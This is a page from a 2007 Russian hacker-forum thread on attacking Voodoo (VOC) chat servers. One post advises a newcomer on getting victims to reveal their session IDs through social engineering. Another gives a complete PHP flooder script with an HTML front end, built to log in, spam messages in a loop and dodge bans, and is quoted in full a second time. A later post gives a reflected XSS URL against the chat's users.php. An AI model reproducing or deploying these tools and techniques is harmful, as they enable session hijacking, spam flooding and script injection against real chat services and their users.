HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Чаты
Перезагрузить страницу Voodoo чаты
   
 
Страница 20 из 26 « Первая < 10 16 17 18 19 20 21 22 23 24 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.04.2007, 23:40
goodkit
Участник форума
Регистрация: 19.05.2006
Сообщений: 181
С нами: 10514859

Репутация: 78
По умолчанию
Цитата:
Сообщение от EaSy  
Привет, принимайте новичка) помагите с получением сессий с \\www.love-chat.ru

Проблема в том что я обладаю не плохой СИ, но мало понимаю в сниферах=(

И ещё, как можно обычному юзеру (без XSS) посматреть свою сессию, а уж сказать её мне я его заставлю.

Заранее благадарю, с уважением ИЗ.
Чат действительно Voodoo, чё то он грузитца как будто у меня dial-up стоит

Ну попповоду сниферов юзай поиск, тут про xss и сниферы уже можно томов 5 собрать! А сессию открой html страницу sendera (это тот прямоугольничег где ты текст печатаешь что бы отправить) в txt и найди session, выглядеть будет так session=dd165fb008f5aac025a34ec7fa788939

Или там где мой статус, кликни правой кнопкой и зайди в свойства (смотрел чат через IE 6)

Но предупреждаю! Я один раз с помощью СИ зоставил жертву выдать мне её сессию, но мне пришло лиж #1234, потом выяснил что в чате стоял фильтр!!! Так что придумаешь что нибудь!

Так и есть, если просто вбить сессию то фильтр её отфильтрует!
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось goodkit; 12.04.2007 в 23:48..
 

  #2  
Старый 14.04.2007, 13:13
EaSy
Новичок
Регистрация: 12.04.2007
Сообщений: 2
С нами: 10042778

Репутация: 1
По умолчанию
Знаю что лол) но обьясните как открыть html страницу sendera? если вы про просмотр хтмл кода, то у сендера он не открываетЦа.
 

  #3  
Старый 14.04.2007, 19:56
Apel1sin
Новичок
Регистрация: 02.02.2007
Сообщений: 3
С нами: 10142327

Репутация: 1
По умолчанию
neval где навископ скачать,а то ссылки везде убитые,а мой нависком непашет
 

  #4  
Старый 14.04.2007, 22:26
syzspectroom
Новичок
Регистрация: 13.04.2007
Сообщений: 3
С нами: 10041094

Репутация: 0
По умолчанию
2 Apel1sin
http://syzspectroom.phpnet.us/NAVUNS.rar точно рабочий.. залил только что
 

  #5  
Старый 08.05.2007, 01:17
bushkaaa
Новичок
Регистрация: 07.05.2007
Сообщений: 3
С нами: 10006763

Репутация: 0
По умолчанию
Уважаемые хакеры есле вам не трудно попробуйте чат http://chatica.ru
 

  #6  
Старый 15.06.2007, 14:59
Gho_st
Познающий
Регистрация: 24.06.2005
Сообщений: 79
С нами: 10988375

Репутация: 11
По умолчанию
php Флудер для Voc чатов
vocflood.php
PHP код:
<? 
#########                                                                             #########
#########                     G h o _ s t   [  c  ]  2 o o 7              #########
#########                                                                             #########
$k mt_rand(0,99);
mt_srand(time() + (double)microtime()*$k);
$chat=$_GET['chat'];
$name=$_GET['name'];
$pass=$_GET['pass'];
$Text=$_GET['Text'];
$r $_GET['r'];
$SID join('',file("$chat./voc.php?user_name=$name&password=$pass&room=$r")); 
$st1 strpos($SID,"?session=");
$SID substr($SID,$st1+9); 
$st2 strpos($SID,"&");
$SID substr($SID,0,$st2);  #  сессия
$Color mt_rand(022); # случайный цвет
$Text $Text.mt_rand(0,999);$Text UrlEncode($Text);
$df file("$chat./sender.php?session=$SID&mesg=$Text&user_color=$Color"); 
$df2 file("$chat/logout.php?session=$SID");
echo "<script language=javascript>document.location.reload();</script>";
?>
и HTML форма для удобства

Код HTML:
<HTML>
<h1>Voodoo chat flooder</h1><h2>by Gho_st</h2>
<form action="vocflood.php" method="GET">
Аддрес чата <input type=text name=chat value="http://"><br>
Ник <input type=text name=name><br>
Пароль <input type=text name=pass><br>
Строка <input type=text name=Text><br>
Комната <select name="r" class="input" tabindex="102">
<option value="0" selected>1</option>
<option value="1">2</option>
<option value="2">3</option>
<option value="3">4</option>
<option value="4">5</option>
</select>
<input type=submit value="Запустить">
</HTML>
уже вроде был выложен один флудер для voc чатов
мой флудер имеет некотрые преимущества перед ним
в частности не надо каждый раз вписывать сессию
+ он рабоает циклично заходит отправляет сообщение выходит

таким образом забанить такого бота не такто просто



___
з.ы. есть более продвинутая версия бота
недорого ... пишите в асю
Последний раз редактировалось Gho_st; 17.06.2007 в 19:44..
 

  #7  
Старый 09.08.2007, 01:46
HALK
Новичок
Регистрация: 29.06.2007
Сообщений: 2
С нами: 9930773

Репутация: 5
По умолчанию
Цитата:
Сообщение от Gho_st  
php Флудер для Voc чатов
vocflood.php
PHP код:
<? 
#########                                                                             #########
#########                     G h o _ s t   [  c  ]  2 o o 7              #########
#########                                                                             #########
$k mt_rand(0,99);
mt_srand(time() + (double)microtime()*$k);
$chat=$_GET['chat'];
$name=$_GET['name'];
$pass=$_GET['pass'];
$Text=$_GET['Text'];
$r $_GET['r'];
$SID join('',file("$chat./voc.php?user_name=$name&password=$pass&room=$r")); 
$st1 strpos($SID,"?session=");
$SID substr($SID,$st1+9); 
$st2 strpos($SID,"&");
$SID substr($SID,0,$st2);  #  сессия
$Color mt_rand(022); # случайный цвет
$Text $Text.mt_rand(0,999);$Text UrlEncode($Text);
$df file("$chat./sender.php?session=$SID&mesg=$Text&user_color=$Color"); 
$df2 file("$chat/logout.php?session=$SID");
echo "<script language=javascript>document.location.reload();</script>";
?>
и HTML форма для удобства

Код HTML:
<HTML>
<h1>Voodoo chat flooder</h1><h2>by Gho_st</h2>
<form action="vocflood.php" method="GET">
Аддрес чата <input type=text name=chat value="http://"><br>
Ник <input type=text name=name><br>
Пароль <input type=text name=pass><br>
Строка <input type=text name=Text><br>
Комната <select name="r" class="input" tabindex="102">
<option value="0" selected>1</option>
<option value="1">2</option>
<option value="2">3</option>
<option value="3">4</option>
<option value="4">5</option>
</select>
<input type=submit value="Запустить">
</HTML>
уже вроде был выложен один флудер для voc чатов
мой флудер имеет некотрые преимущества перед ним
в частности не надо каждый раз вписывать сессию
+ он рабоает циклично заходит отправляет сообщение выходит

таким образом забанить такого бота не такто просто



___
з.ы. есть более продвинутая версия бота
недорого ... пишите в асю
Тоесть флудеров нету рабочих!?
 

  #8  
Старый 17.06.2007, 19:48
Gho_st
Познающий
Регистрация: 24.06.2005
Сообщений: 79
С нами: 10988375

Репутация: 11
По умолчанию
к сожелению при тестирование флудера на движке VOC++ Business Edition
было выявлено то что сообщения не отправляются
хм.. почему то вобще при передаче GET запросом сессии и текста сообщения мессага не отправляется=((
если ктонибудь знает в чем трабла просветите
 

  #9  
Старый 29.06.2007, 19:27
Gho_st
Познающий
Регистрация: 24.06.2005
Сообщений: 79
С нами: 10988375

Репутация: 11
По умолчанию
ещё один XSS в Voc
Код:
http://sitename/chat/users.php?look_for=%3CSCRIPT%3Ealert('XSS')%3C/SCRIPT%3E
 

  #10  
Старый 01.08.2007, 11:48
_Sniper_
Banned
Регистрация: 21.07.2007
Сообщений: 504
С нами: 9898343

Репутация: 445


По умолчанию
У нас любимая бага была в сети..стоял у нас VOC++ Christ. Edit..ещё и дэмо =)
Собирали чел 5 и зажимали ENTER или пихали спички. Вот весёлые были времена
 
 
Страница 20 из 26 « Первая < 10 16 17 18 19 20 21 22 23 24 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.